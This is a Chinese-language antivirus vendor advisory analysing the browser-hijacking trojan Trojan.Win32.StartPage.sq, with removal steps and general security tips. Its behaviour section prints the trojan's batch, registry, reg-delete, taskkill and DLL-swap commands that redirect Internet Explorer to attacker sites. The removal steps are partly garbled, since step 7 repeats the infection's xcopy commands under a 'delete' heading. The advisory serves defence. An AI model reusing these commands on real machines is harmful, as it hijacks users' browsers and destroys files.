病毒簡介
超級巡警團隊監測到惡意程式Trojan.Win32.StartPage.sq正在傳播。超級巡警建議用戶使用超級巡警來防禦查殺此類病毒。同時提醒廣大用戶及時更新病毒庫,對該程式進行有效查殺。
病毒分析
病毒標籤:
病毒名稱:Trojan.Win32.StartPage.sq
病毒別名:首頁篡改蟲
病毒類型:木馬類
危害級別:2
感染平台:Windows
病毒大小:273,259 位元組
S H A 1 :2527a13b7bcc7b40953821ce40277b5ef1e6aa20
加殼類型:Rar
開發工具:Microsoft Visual C++ 6.0
病毒行為
1、病毒運行後通過自解壓腳本命令,解壓病毒檔案到:
Path=%windir%\system32
自解壓為以下病毒檔案:
“hao123.zip”,“go.bat”,“hao123.exe”,“lnternet Explorer.lnk”,資料夾“1”,資料夾“2”,資料夾“3”
2、自解壓的同時運行go.bat:
@echo off
start /min hao123.exe
3、病毒檔案hao123.exe運行後,添加以下註冊表項及鍵值來達到篡改主頁等目的:
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
數值數據 "C:\Program Files\Internet Explorer\iexplore.exe" http://www.5414.
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
數值名稱:Start Page
數值數據: www.111333/?in=StarPage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
數值名稱:Search Page
數值數據:www.111333/?in=IESearch
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
數值名稱:Search Bar
數值數據:www.111333/?in=IERSearch
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
數值名稱:{871C5380-42A0-1069-A2EA-08002B30309D}
數值數據: 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
數值名稱:{871C5380-42A0-1069-A2EA-08002B30309D}
數值數據: 1
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\
IEXPLORE.EXE\shell\open\command
數值數據:
C:\\Program Files\Internet Explorer\
iexplore.exe http://www.111333/?in=startmenu
4、刪除以下註冊表項:
"reg delete HKEY_CLASSES_ROOT\piffile /v IsShortcut /f "
"reg delete HKEY_CLASSES_ROOT\lnkfile /v IsShortcut /f "
5、刪除以下檔案:
del "%ALLUSERSPROFILE%\..\*Internet*.lnk" /s "
del "%ALLUSERSPROFILE%\..\*Internet*.url" /s "
6、分別複製解壓出來的3個病毒資料夾內的檔案到以下路徑:
xcopy "1\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\桌面\" /k /c /q /r /y
xcopy "2\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\「開始」選單\程式\" /k /c /q /r /y
xcopy "3\lnternet Explorer.lnk" "%AppData%\Microsoft\Internet Explorer\Quick Launch" /k /c /q /r /y
7、強行結束以下進程:
taskkill /f /im explorer.exe
taskkill /f /im IEXPLORE.EXE
8、重命名以下檔案,達到URL轉向病毒指定網址的目的:
rename %windir%\system32\shdoclc.dll shlos.rar
rename %windir%\system32\hao123.zip shdoclc.dll
替換的shdoclc.dll檔案的stringtable的76目錄項下的1211號資源字元串,實現“當用戶在IE地址欄輸入錯誤的時候,轉向病毒設定URL="http://www.2d2/?wd=%s&ie=utf-8&id=5"
9、cls清屏後,再打開explorer.exe:
"cls"
"%systemroot%\explorer.exe"
解決方案
推薦方案:安裝超級巡警進行全面病毒查殺。超級巡警用戶請升級到最新病毒庫,並進行全盤掃描。
超級巡警下載地址:http://www.sucop/download/16.html
專殺下載地址:http://a1.sucop/killer/StartPage_killer.zip
1、結束病毒進程。打開超級巡警,選擇進程管理功能,終止以下進程:
hao123.exe
2、刪除病毒生成以下檔案:
Path=%windir%\system32
“go.bat”,“hao123.exe”,“lnternet Explorer.lnk”“hao123.zip”,資料夾“1”,資料夾“2”,資料夾“3”
3、把被病毒修改過的註冊表項按照如下修改:
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
數值數據 "C:\Program Files\Internet Explorer\iexplore.exe"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
數值名稱:Start Page
數值數據: about:blank
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
數值名稱:Search Page
數值數據:
http://www.microsoft/isapi/redir.dllprd=ie&;ar=iesearch
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu
數值名稱:{871C5380-42A0-1069-A2EA-08002B30309D}
數值數據: 0
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
數值名稱:{871C5380-42A0-1069-A2EA-08002B30309D}
數值數據: 0
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\
IEXPLORE.EXE\shell\open\command
數值數據:
"C:\Program Files\Internet Explorer\iexplore.exe"
4、刪除以下註冊表鍵值:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
數值名稱:Search Bar
數值數據:www.111333/?in=IERSearch
5、添加以下註冊表項鍵值:
HKEY_CLASSES_ROOT\piffile /v IsShortcut /f
HKEY_CLASSES_ROOT\lnkfile /v IsShortcut /f
6、新建文本文檔寫入如下內容,並保存為sucop.bat,運行
rename %windir%\system32\shlos.rar shdoclc.dll
rename %windir%\system32\shdoclc.dll sq.rar
7、刪除以下檔案:
xcopy "1\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\桌面\" /k /c /q /r /y
xcopy "2\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\「開始」選單\程式\" /k /c /q /r /y
xcopy "3\lnternet Explorer.lnk" "%AppData%\Microsoft\Internet Explorer\Quick Launch" /k /c /q /r /y
用正常檔案來恢復以下檔案:
%ALLUSERSPROFILE%\..\*Internet*.lnk
%ALLUSERSPROFILE%\..\*Internet*.url
安全建議
1、立即安裝或更新防病毒軟體並對記憶體和硬碟全面掃描(推薦安裝超級巡警)。
2、根據實際安全級別需要適當考慮選用防火牆,並進行正確的設定。
3、使用超級巡警的補丁檢查功能,及時安裝系統補丁。
4、禁用或刪除不必要的的帳號,對管理員帳號設定一個強壯的密碼。
5、禁用不必要的服務。
6、不要使用IE核心的瀏覽器。
7、不要隨便打開不明來歷的電子郵件,尤其是郵件附屬檔案。
8、不要隨意下載不安全網站的檔案並運行。
9、不要隨便登入不明網站,特別不要隨意登入需要自己銀行帳號或手機及計算機系統帳號的不
明網站。
10、不要輕易打開即時通訊工具中發來的連結或執行檔。
附註:
%System% 是一個可變路徑,在windows95/98/me中該變數是指%Windir%\System,在
WindowsNT/2000/XP/2003/VISTA中該變數指%Windir%\System32。其它:
%SystemDrive% 系統安裝的磁碟分區
%SystemRoot% = %Windir% WINDODWS系統目錄
%ProgramFiles% 應用程式默認安裝目錄
%AppData% 應用程式數據目錄
%CommonProgramFiles% 公用檔案目錄
%HomePath% 當前活動用戶目錄
%Temp% =%Tmp% 當前活動用戶臨時目錄
%DriveLetter% 邏輯驅動器分區
%HomeDrive% 當前用戶系統所在分區